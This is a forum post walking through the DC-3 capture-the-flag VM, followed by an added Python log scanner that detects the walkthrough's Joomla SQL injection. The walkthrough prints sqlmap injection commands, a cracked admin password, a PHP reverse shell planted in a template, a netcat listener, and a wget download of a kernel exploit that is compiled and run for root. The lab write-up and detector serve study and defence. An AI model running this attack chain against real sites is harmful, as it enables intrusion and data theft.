PakistanDatabase.com

DC-3 Walkthrough

H4K3R (Member, joined Apr 8, 2024)

Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.


Security Level: Beginner


Penetrating Methodology:


  • Discovering the target's IP
  • Network scanning (Nmap)
  • Surfing the HTTP service port
  • Searching exploits via searchsploit
  • Using sqlmap to dump database information
  • Using John the Ripper to crack the password
  • Logging into Joomla
  • Injecting malicious PHP reverse shell code
  • Using Netcat for obtaining a reverse connection
  • Exploiting the kernel
  • Getting root access
  • Reading the final flag

Walkthrough


Let’s start off with scanning the network to find our target.

Code:
netdiscover

We found our target's IP address, 192.168.1.104; our next step is to scan it with nmap.

Code:
nmap -A 192.168.1.104

From the nmap result we found that only the HTTP service is running on port 80, and we got to know that the Joomla CMS is installed on this website.

So we navigate to port 80 by opening the target IP in the web browser and read the admin's text message; moreover, the website was running on the Joomla CMS, as found above.

So, to identify the installed Joomla version, we checked its README file. We can clearly see that the version is Joomla 3.7; I think this might come in handy.

We looked for Joomla 3.7 in searchsploit and found a Joomla SQL injection exploit. We copied the exploit's 42033.txt file to our machine and read its contents. It revealed a command for sqlmap along with a vulnerable URL.

Then we executed the sqlmap command given below and, with its help, looked for the database names, which revealed 5 database entries, as shown in the image below, where I noticed joomladb.

Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Let’s again use sqlmap to look for the tables and columns.

Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch

After getting the table names, we dumped the contents of the table #__users using sqlmap, which revealed credentials that come in handy to log into Joomla. But the password is encoded, so we need to crack it. Time to fire up John.

Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch

We saved the hash on our system and used John the Ripper to crack it. Now we have both credentials to log into Joomla.

Username- admin
Password- snoopy

Let’s login into Joomla as admin.

After spending some time exploring, we got the idea to add malicious PHP code (available inside Kali: /usr/share/webshells/php) to index.php of the beez3 template to get a reverse shell, as shown below.

On the other side, we set up a netcat listener. Upon execution, we got a shell on the target system. To get a proper shell, we used the Python one-liner to spawn a TTY shell.

Code:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a

From the LSB description, we clearly knew that this version of Ubuntu has a direct exploit which can be used to get root access and find our final flag.

Without wasting time, we found a privilege escalation exploit for Ubuntu 16.04. We downloaded and extracted it.

Code:
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39772.zip
ls
cd 39772
ls
tar -xvf exploit.tar

After running the exploit, we easily got root access and thus our final flag.

Code:
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt

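As an added example, not part of H4K3R's post and not code from the DC-3 VM or from Joomla or sqlmap: a small Python script that scans Apache combined-format access logs for the request pattern this walkthrough sends through sqlmap. It flags a `list[fullordering]` value on `com_fields` that is not a plain `alias.column ASC|DESC` ordering, SQL function names such as `updatexml` anywhere in the decoded query, and the sqlmap user-agent. The log regex, the `SAFE_ORDERING` shape, the marker list and the sample log lines are my own assumptions and constructions for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; the regex is an assumption for the constructed sample below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed shape of a benign Joomla list ordering value: "<alias>.<column> ASC|DESC".
SAFE_ORDERING = re.compile(r'^[a-z_][a-z0-9_]*\.[a-z_][a-z0-9_]*\s+(asc|desc)$', re.IGNORECASE)

# Error-based / time-based injection primitives; the post's sqlmap URL injects updatexml.
SQL_MARKERS = ('updatexml', 'extractvalue', 'sleep(', 'benchmark(')

# Constructed sample log lines (not taken from the post). Lines 2 and 3 should be flagged.
SAMPLE_LOG = """\
192.168.1.10 - - [08/Apr/2024:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
192.168.1.20 - - [08/Apr/2024:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 210 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)"
192.168.1.20 - - [08/Apr/2024:10:00:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id%20ASC HTTP/1.1" 200 4801 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.1.30 - - [08/Apr/2024:10:00:09 +0000] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.id%20DESC HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into fields and decode its query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qs percent-decodes both keys and values, so list%5Bfullordering%5D
    # and list[fullordering] end up under the same key.
    rec['query'] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of reasons a parsed request looks like the com_fields injection."""
    reasons = []
    q = rec['query']
    if q.get('option') == ['com_fields']:
        for value in q.get('list[fullordering]', []):
            if not SAFE_ORDERING.match(value.strip()):
                reasons.append(f'unexpected list[fullordering] value: {value!r}')
    # Check decoded query values plus the path, so encoded parentheses are still caught.
    decoded = (rec['path'] + ' ' + ' '.join(v for vs in q.values() for v in vs)).lower()
    for marker in SQL_MARKERS:
        if marker in decoded:
            reasons.append(f'SQL function in request: {marker}')
    if 'sqlmap' in rec['ua'].lower():
        reasons.append('sqlmap user-agent')
    return reasons


def scan(log_text):
    """Parse every line of a log and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({'ip': rec['ip'], 'time': rec['ts'],
                             'status': rec['status'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding['time'], finding['ip'], finding['status'], '; '.join(finding['reasons']))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the 500 status on the injected request is the other signal worth correlating, since the error-based technique the post's sqlmap command relies on produces database errors on the server side.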